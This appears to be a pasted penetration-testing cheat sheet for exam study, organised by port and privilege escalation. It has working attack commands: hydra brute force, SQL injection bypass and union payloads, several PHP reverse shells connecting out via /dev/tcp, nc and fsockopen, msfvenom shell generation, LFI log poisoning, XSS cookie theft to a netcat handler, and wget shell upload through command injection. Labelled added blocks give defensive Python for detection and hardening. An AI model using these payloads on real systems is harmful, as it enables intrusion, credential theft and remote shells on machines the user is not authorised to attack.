Untitled
a guest
Oct 5th, 2018
PORT 21 (FTP)

-Check for anonymous login (anonymous:anonymous)
-Check for directory traversal (ls ../../../) to enumerate files outside the FTP root.
 Look for password files that could be used on ssh or a webserver.
-Check ftp version for buffer overflows or other exploits.
-Check to see if there are writable directories, like web roots.
 EXAMPLE: (cd wwwroot; put shell.asp)

PORT 22 (SSH)

-Banner grab version (nc ipaddress 22)
-Google ssh version for exploits etc.
-Predictable PRNG? (sufferance)
-Once a username is discovered TRY A BRUTEFORCE
 EXAMPLE: (hydra -l patrick -P /usr/share/wordlists/rockyou.txt 10.11.1.24 ssh)
-SSH can be used to portforward any service that is only accepting local connections
 EXAMPLE: (ssh -L 127.0.0.1:80:intra.example.com:80 gw.example.com)

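From the defender's side, the hydra run above is loud: every guess is a "Failed password" line in sshd's auth log, all from one source address, followed by one "Accepted" line if a guess lands. The block below is an added example (not part of the original note) that counts failures per source IP over constructed auth.log lines and raises an alert at a threshold, plus a second alert when a login is accepted from an address already over that threshold. The log lines, host names and the threshold of 5 are assumptions for the demo.

```python
import re
from collections import Counter, defaultdict

# Constructed sample of OpenSSH auth.log lines (not from any real host).
SAMPLE_AUTH_LOG = """\
Oct  5 10:00:01 host sshd[1201]: Failed password for patrick from 10.11.1.24 port 51000 ssh2
Oct  5 10:00:02 host sshd[1202]: Failed password for patrick from 10.11.1.24 port 51001 ssh2
Oct  5 10:00:02 host sshd[1203]: Failed password for invalid user admin from 10.11.1.24 port 51002 ssh2
Oct  5 10:00:03 host sshd[1204]: Failed password for patrick from 10.11.1.24 port 51003 ssh2
Oct  5 10:00:03 host sshd[1205]: Failed password for patrick from 10.11.1.24 port 51004 ssh2
Oct  5 10:00:04 host sshd[1206]: Failed password for patrick from 10.11.1.24 port 51005 ssh2
Oct  5 10:00:09 host sshd[1207]: Accepted password for patrick from 10.11.1.24 port 51006 ssh2
Oct  5 10:01:00 host sshd[1208]: Failed password for alice from 192.168.11.7 port 40001 ssh2
Oct  5 10:01:30 host sshd[1209]: Accepted publickey for alice from 192.168.11.7 port 40002 ssh2
"""

# "invalid user" appears when the username does not exist; both forms count as a failure.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (\S+) for (\S+) from (\S+) port \d+")


def analyze_auth_log(text, threshold=5):
    """Return (failures_per_ip, alerts).

    An alert ("bruteforce", ip, users_tried) is raised the moment one source IP
    reaches `threshold` failed logins.  An accepted login from an IP that is
    already at or over the threshold is reported as a likely successful guess
    ("success_after_bruteforce", ip, user), which is the event worth paging on.
    """
    failures = Counter()
    users_tried = defaultdict(set)
    alerts = []
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            user, ip = m.groups()
            failures[ip] += 1
            users_tried[ip].add(user)
            if failures[ip] == threshold:  # fire once per IP, not on every further failure
                alerts.append(("bruteforce", ip, sorted(users_tried[ip])))
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            _method, user, ip = m.groups()
            if failures[ip] >= threshold:
                alerts.append(("success_after_bruteforce", ip, user))
    return failures, alerts


FAILURES, ALERTS = analyze_auth_log(SAMPLE_AUTH_LOG)

if __name__ == "__main__":
    for alert in ALERTS:
        print(alert)
```

The threshold is deliberately low for the demo; in practice tune it per environment, and note that a one-guess-per-address slow scan will stay under any per-IP count, which is why key-only authentication and fail2ban-style lockouts matter more than the alert itself.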
PORT 23 (TELNET)

-Bruteforce (hydra -l root -P /usr/share/wordlists/rockyou.txt 10.11.1.12 telnet)
-Banner grab version and look for exploits (nc 10.11.1.12 23)

PORT 25 (SMTP)

-Manually or automated VRFY users, greet server with ehlo if needed.
-Bear in mind pop3 could also be vulnerable to login/access.
-Check version as always, banner grab with telnet

PORT 80 (HTTP)

-Nikto to check for low hanging fruit (nikto -h http://10.11.1.12)
-Google all versions returned from Nikto, watch for shellshock, .action pages, robots.txt, manually poke around, check source code
-Gobuster (/usr/bin/gobuster -w /usr/share/wordlists/dirb/big.txt -u http://10.11.0.42). Add -x to search extensions
-Login Form = SQLI or Default Credentials, or rabbithole. Those are the main options.
-Try admin:admin, admin:password etc.
-Try to understand the webserver, what's its purpose? what features are available? if something stands out, it could be the way in...

-SQLI >> ' or 1=1-- >> admin'-- >> ' or '1'='1#
-Error based SQLI, identify query string or error (http://meme.com?id=1)
-Enumerate columns (http://meme.com?id=1 order by 1) keep going until unknown column error.
-Determine best column to use to display output (http://meme.com?id=1 union all select 1,2,3,4,5)
-If you see a number on the screen that column can be used.
-Find tables in database (http://meme.com?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables)
-Display table columns in tables found (http://meme.com?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns WHERE table_name='users')
-Display column contents, use concat for multiple
 (http://meme.com?id=1 union all select 1,2,3,concat(usernames,0x3a,passwords),5 FROM users)
-Side note sometimes sleep(0) comes in handy if no output is being displayed, see Hackademic_RTB1 box.

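Why ' or 1=1-- and admin'-- work, and what stops them, is easiest to see side by side. The block below is an added example (not from the original note): a login check built by string concatenation next to the same check as a parameterized query, run against a constructed in-memory SQLite table. The table, the two accounts and their passwords are made-up demo data.

```python
import sqlite3


def _setup_db():
    """Constructed in-memory users table (demo data, not real credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "patrick", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """Concatenated query: quotes and -- in the input become SQL syntax.
    admin'-- closes the string and comments out the password check;
    ' or 1=1-- makes the WHERE clause true for every row."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.Error:
        # Error-based probing shows up here: a malformed payload raises a DB error,
        # which a careless app echoes back to the browser.
        return None
    return [r[0] for r in rows]


def login_safe(conn, username, password):
    """Parameterized query: the driver binds the values after parsing, so a quote
    or comment marker in the input is compared as data, never executed."""
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchall()
    return [r[0] for r in rows]


def demo():
    conn = _setup_db()
    return {
        "vuln_bypass": login_vulnerable(conn, "admin'--", "anything"),
        "vuln_or": login_vulnerable(conn, "' or 1=1--", "x"),
        "safe_bypass": login_safe(conn, "admin'--", "anything"),
        "safe_real": login_safe(conn, "admin", "s3cret"),
    }


DEMO = demo()

if __name__ == "__main__":
    for name, result in DEMO.items():
        print(name, "->", result)
```

The same fix applies to the id=1 union probes: bind the id as a parameter (and cast it to an integer before the query) and the order by / union all text has nowhere to go.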
-Check Nikto see if PUT is enabled, if so use nmap scripts to upload a shell. (nmap -p 80 <ip> --script http-put --script-args http-put.url='/uploads/rootme.php',http-put.file='/tmp/rootme.php')
-Also viable are .asp shells or .ps1 for powershell.

-PHP Payloads
1) <?php echo shell_exec("bash -i >& /dev/tcp/10.0.0.1/8080 0>&1");?>
2) <?php echo shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f");?>
3) <?php echo shell_exec($_GET['e']);?>
4) php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
5) pentest monkey php reverse shell, available here http://pentestmonkey.net/tools/web-shells/php-reverse-shell

-ASP Shell Generation (msfvenom -p windows/shell/reverse_tcp LHOST=10.11.0.42 LPORT=4444 -f asp > shell.asp)

-LFI (Local File Inclusion)
-Basic Test For Apache Linux is 3 Directories ../../../etc/passwd
-Check query strings like ?page=, ?file=
-Older php versions allow truncating the extension ../../../etc/passwd%00 if the server adds an extension to the file
-FILES TO INCLUDE
1) /etc/passwd
2) /etc/shadow ?
3) /root/.ssh/id_rsa
4) index.php
5) Any other files discovered (i see you poison from htb)

-LFI to RCE
-try to include /proc/self/environ
-if this file can be included put one of the php shells as the current user agent. When the file is included the php will be interpreted and run.
-try to include /proc/self/fd
-if this can be included find the main log file by including /proc/self/fd/1 all the way through /proc/self/fd/23
-then change the referer header to php and revisit the file to run the code.
-try to include /var/apache/logs/access.log
-if this can be included get rce.

-RFI (Remote File Inclusion)
-Check ALL LFI QUERY STRINGS!
-listen on standard http port with netcat as a check (nc -lnvp 80) then ?page=http://10.11.0.42
-check if a get request is made to the handler.
-Use a php payload to gain a shell, remember null byte may be added to truncate extension on lower php versions
-If execution of root commands is available from any other means, change the mod of the php shell dir to root suid bit.

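Every LFI and RFI probe above (../ traversal, %00 to drop the appended extension, absolute paths like /proc/self/environ, and http:// in ?page=) abuses the same pattern: a handler that appends an extension to the parameter and includes the result with no containment check. This added example (not from the original note) shows that vulnerable resolver next to a hardened one that rejects NUL bytes, URL schemes, and any path that resolves outside the page root. The handler name, the page root in a temp dir and the .php extension are assumptions for the demo; it covers both the LFI and the RFI sections.

```python
import os
import tempfile
from urllib.parse import urlparse


class IncludeRejected(Exception):
    pass


def resolve_include_vulnerable(page_root, page_param, ext=".php"):
    """The pattern the LFI/RFI checks target: extension appended, nothing validated.
    ../ walks out of page_root, an absolute path replaces it, a NUL byte (on old PHP)
    cuts off the extension, and a URL makes the include fetch remote code."""
    return os.path.join(page_root, page_param + ext)


def resolve_include(page_root, page_param, ext=".php"):
    """Hardened resolver for a ?page= style include (hypothetical handler name)."""
    if "\x00" in page_param:
        raise IncludeRejected("NUL byte in include name")
    if urlparse(page_param).scheme:  # http://, ftp://, php:// and similar wrappers
        raise IncludeRejected("remote or wrapper scheme not allowed")
    root = os.path.realpath(page_root)
    # realpath collapses ../ and symlinks, so the containment test sees the
    # final location, not the string the client sent.
    candidate = os.path.realpath(os.path.join(root, page_param + ext))
    if os.path.commonpath([root, candidate]) != root:
        raise IncludeRejected("path escapes page root")
    return candidate


def classify(page_root, params):
    """Map each candidate ?page= value to 'allowed' or the rejection reason."""
    out = {}
    for p in params:
        try:
            resolve_include(page_root, p)
            out[p] = "allowed"
        except IncludeRejected as e:
            out[p] = str(e)
    return out


# Constructed probe list: the traversal strings from the notes plus one clean page name.
PROBES = [
    "home",
    "../../../etc/passwd",
    "../../../etc/passwd\x00",     # what %00 decodes to
    "http://10.11.0.42/shell",
    "/proc/self/environ",
]


def demo():
    root = tempfile.mkdtemp()  # stands in for the web app's page directory
    return classify(root, PROBES)


DEMO_RESULT = demo()

if __name__ == "__main__":
    for probe, verdict in DEMO_RESULT.items():
        print(repr(probe), "->", verdict)
```

An allowlist of page names is stricter still and is the better choice when the set of includable pages is known; the realpath containment check is the general fallback when it is not.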
-XSS (Cross Site Scripting)
-Easy enough, first try script tags, then an iframe... maybe some shenanigans like <scr<script>ipt> other encodings
-Hijack admin password by making a request to a netcat port 80 handler (http://10.11.0.41/meme.php + document.cookie)
-Does this even apply to the exam??
-Can maybe use stored xss to make GET api requests to do some fun stuff (might be out of scope entirely)

-Command Injection
-Pretty simple, webserver calls upon the operating system to perform tasks without sanitizing arguments.
-ping.php, can input something with a separator (127.0.0.1; ls)
-From there use wget payload to upload a shell (127.0.0.1; wget http://10.11.0.42/shell.php -O /var/www/html/shell.php)
-Blind and File-based out of scope NO COMMIX ALLOWED

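The ping.php case is the textbook one: the server builds a shell string from the host parameter, so a separator ends the ping and starts a second command. This added example (not from the original note) shows the string-built command next to the safe form, an argument vector passed to subprocess with shell=False after the host is validated as an IP literal or plain hostname. The helper names are made up; shell_would_run is a deliberately simplified model of how a shell splits on ; && and ||, there only to make the split visible.

```python
import ipaddress
import re
import shlex
import subprocess

HOSTNAME_RE = re.compile(
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*")


def build_ping_vulnerable(host):
    """Command line built by concatenation, the ping.php pattern.
    Whatever follows a ; in `host` is parsed by the shell as another command."""
    return "ping -c 1 " + host


def shell_would_run(cmdline):
    """Illustrative only: split the way a POSIX shell would on ; && ||, then
    word-split each part.  Returns the list of argv vectors the shell would run."""
    parts = re.split(r"\s*(?:;|&&|\|\|)\s*", cmdline)
    return [shlex.split(p) for p in parts if p]


def validate_host(host):
    """Accept an IP address literal or a plain hostname; reject everything else,
    so separators, spaces and quotes never reach the command at all."""
    try:
        ipaddress.ip_address(host)
        return host
    except ValueError:
        pass
    if HOSTNAME_RE.fullmatch(host):
        return host
    raise ValueError("invalid host: %r" % host)


def build_ping_safe(host):
    """Argument vector for subprocess.run(..., shell=False): no shell parses it,
    so even a stray ';' would be one character inside one argument."""
    return ["ping", "-c", "1", validate_host(host)]


def safe_argv_or_none(host):
    """What the hardened handler does with the request: argv, or None (reject)."""
    try:
        return build_ping_safe(host)
    except ValueError:
        return None


def run_ping(host, timeout=5):
    """Execute the safe form.  Not called by the demo; shown for completeness."""
    return subprocess.run(build_ping_safe(host), capture_output=True,
                          text=True, timeout=timeout).stdout


if __name__ == "__main__":
    injected = "127.0.0.1; ls"
    print(shell_would_run(build_ping_vulnerable(injected)))  # two commands
    print(safe_argv_or_none(injected))                        # None
    print(safe_argv_or_none("127.0.0.1"))                     # one argv
```

Validation and shell=False are both needed: shell=False alone stops the separator trick but still lets a caller pass option-looking values to the binary, and validation alone is only as good as the regex.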
-Weak Authentication
-Pretty straight forward admin:admin, admin:password, administrator:administrator etc.
-Apache Tomcat, tomcat:tomcat, tomcat:password
-GOOGLE ALL DEFAULT PASSWORDS

-In general, use brain and google all versions, remember a lot is out of scope for oscp... no xxe or pickle deserialization lol

PORT 445 (SMB)
-Note this is one case where sparta can save a lot of time...
-run nmap nse scripts on the target (nmap --script=vuln 10.11.0.41)
-Find smb users (nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254)
-Try to find open smb shares (nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24)
-access the share (smbclient "\\\\ip\\Bob Share\\rootfs") sufference lol
-Try to read ssh keys, or other files maybe /etc/shadow?
-Use any exploits that provide RCE, manual eternalblue https://github.com/3ndG4me/AutoBlue-MS17-010 etc.
-remember filtered port 445 or 139 in privesc can be portforwarded to use smb exploits!!
-impacket smb client very useful!

PRIVESC LINUX
-check current user (whoami)
-check kernel version (uname -a) google for exploits, check exploitdb
-upload linuxprivchecker.py (python -m SimpleHTTPServer 80) (wget http://10.11.0.42/linuxprivchecker.py)
-in general use brain.
-ssh tunnel filtered services.
-check to see writable files, remember privesc with python scripts and how import reads from the pwd
-check sudo privileges (sudo -l) use those to overwrite files, or to run other commands as root
-check for all files with "pass" in them.
-is /etc/passwd writable? if so use (echo root::0:0:root:/root:/bin/bash > /etc/passwd) then (su)
-if /etc/shadow is readable try and crack hashes, unshadow with /etc/passwd first (unshadow passwd.txt shadow.txt > passwords.txt) (john passwords.txt /usr/share/wordlists/rockyou.txt)
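The writable /etc/passwd trick leaves a distinctive trace: an entry with an empty password field, and usually a second UID 0 account. This added example (not from the original note) is a small audit that parses passwd-format text and flags exactly those conditions, plus a mode check for the world-writable file that makes the trick possible. The sample passwd content is constructed, with two bad entries planted on purpose.

```python
import os
import stat

# Constructed /etc/passwd-style content.  Two problems are planted: "toor" is a
# second UID 0 account with no password, and "svc" has an empty password field.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
patrick:x:1000:1000:patrick:/home/patrick:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
toor::0:0:root:/root:/bin/bash
svc::1001:1001:service:/var/svc:/bin/sh
"""

EMPTY_PW = "empty password field"
EXTRA_UID0 = "extra UID 0 account"
HASH_IN_PASSWD = "password hash stored in passwd instead of shadow"


def audit_passwd(text):
    """Return a list of (line_number, account, finding) for suspicious entries.

    An empty second field means login with no password at all (this is what
    root::0:0:... creates).  'x', '*' or a leading '!' are the normal shadowed
    or locked markers; anything else is a real hash sitting in a world-readable
    file.  Any UID 0 account other than root is a planted backdoor until proven
    otherwise.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append((lineno, name, EMPTY_PW))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            findings.append((lineno, name, HASH_IN_PASSWD))
        if uid == "0" and name != "root":
            findings.append((lineno, name, EXTRA_UID0))
    return findings


def mode_is_world_writable(mode):
    """True when the 'other' write bit is set on a st_mode value."""
    return bool(mode & stat.S_IWOTH)


def check_passwd_file(path="/etc/passwd"):
    """Live check of a real file: permission finding plus content findings."""
    findings = []
    if mode_is_world_writable(os.stat(path).st_mode):
        findings.append((0, path, "world-writable"))
    with open(path) as fh:
        findings.extend(audit_passwd(fh.read()))
    return findings


AUDIT = audit_passwd(SAMPLE_PASSWD)

if __name__ == "__main__":
    for finding in AUDIT:
        print(finding)
```

check_passwd_file is the one to schedule on real hosts; the other functions are pure so they can be unit-tested against constructed input as done here.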